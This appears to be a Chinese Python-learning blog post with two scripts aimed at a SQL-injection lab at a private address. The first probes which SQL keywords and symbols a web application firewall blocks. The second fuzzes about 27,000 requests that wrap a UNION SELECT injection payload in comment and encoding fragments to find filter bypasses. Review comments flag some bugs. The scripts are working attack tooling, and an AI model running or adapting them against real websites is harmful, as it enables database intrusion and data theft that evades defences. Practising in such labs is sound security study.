python学习之路day6

关于waf的简单脚本 1,检测屏蔽哪些字符。2,fuzz批量测试

1

import requests

# Tokens submitted one at a time to learn which ones the lab target's input
# filter rejects. The list includes '' (empty string, a control case), ' ' (a
# single space) and '\ ' (a backslash followed by a space).
sql_char = ['select', 'union', 'and', 'or', '', 'select union', 'sleep', 'like', 'group', 'order', 'by', 'ascii',
            'updatexml', 'handler', 'insert', '\\', '\ ', '@', 'all', '#', '-', '"', ')', '--', '+', '=', '/',' ']

# Target endpoint: a private (RFC 1918) lab address. NOTE(review): the path
# reads "index,php" with a comma where ".php" would be expected — confirm
# whether that is intentional.
url = "http://192.168.126.132:5001/sqli/less-1/index,php/"

# Browser-like request headers. Content-Type declares a form body, which is
# why post_data below is built as a raw "key=value&key=value" string.
header = {

    'Host': '192.168.126.132:5001',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded'
}
# One POST per token; the response body is classified by a fixed marker string.
for char in sql_char:
    # The body is a pre-built string, not a dict, so requests applies no
    # form-encoding to `char`. NOTE(review): for tokens such as '+', '=' or
    # '#' the outcome may reflect how the server parses the form rather than
    # the filter itself — verify before drawing conclusions.
    post_data = "query=test" + char + "&submit2=sbumit"
    # NOTE(review): no timeout= is passed, so an unresponsive target blocks
    # this loop indefinitely.
    res = requests.post(url, data=post_data, headers=header)
    # 'Illegal Char' in the body is taken to mean the token was rejected.
    if 'Illegal Char' in res.text:
        print("过滤字符: {0}".format(char))  # token was filtered
    else:
        print("通过: {0}".format(char))  # token passed the filter

2

import requests

# Fragment pools that work() combines three at a time (a, b, c from FUZZ).
# fuzz_a: comment and operator fragments, some already percent-encoded;
# fuzz_b: the empty string and a single space;
# fuzz_c: percent-encoded bytes 0x0a-0x0f. Note that '%0g'..'%0j' are not valid
# percent-encodings (g-j are not hex digits) and '%0h' is listed twice, so
# those entries are sent literally and one combination set is duplicated.
fuzz_a = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00','%0a','%23','%20']
fuzz_b = ['',' ']
fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0g','%0h','%0i','%0j','%0h']
FUZZ = fuzz_a + fuzz_b + fuzz_c

def work(url):
    """Send one GET per (a, b, c) triple drawn from FUZZ and print each
    request URL whose response body contains neither "waf" nor "error".

    `url` is used as a prefix; every request is `url` followed by a fixed
    fragment with the three FUZZ items spliced in. With the lists as defined
    above this is len(FUZZ) ** 3 == 30 ** 3 == 27,000 sequential requests to
    the same endpoint — a burst that is conspicuous in server and WAF logs.
    Returns None; output is via print only.
    """
    for a in FUZZ:
        for b in FUZZ:
            for c in FUZZ:
                exp = url + "%27%20union" + "--%20asdasd" + a + b + c + "select" + "%201,2,3%20%23"

                # NOTE(review): no timeout= is passed, so one stalled request
                # blocks the whole run. .content is bytes, so str(response)
                # below produces the "b'...'" repr and the substring tests
                # run against that text.
                response = requests.get(url=exp).content

                # A body mentioning "waf" or "error" is treated as blocked and
                # silently skipped; any other response is reported.
                if "waf" in str(response) or "error" in str(response):
                    pass
                else:
                    print(exp)

if __name__ == '__main__':
    # Lab target (private RFC 1918 address); work() appends its fragments
    # directly after the "id=-1" query parameter.
    url = "http://192.168.126.132:5001/sqli/Less-1/index.php?id=-1"
    work(url)

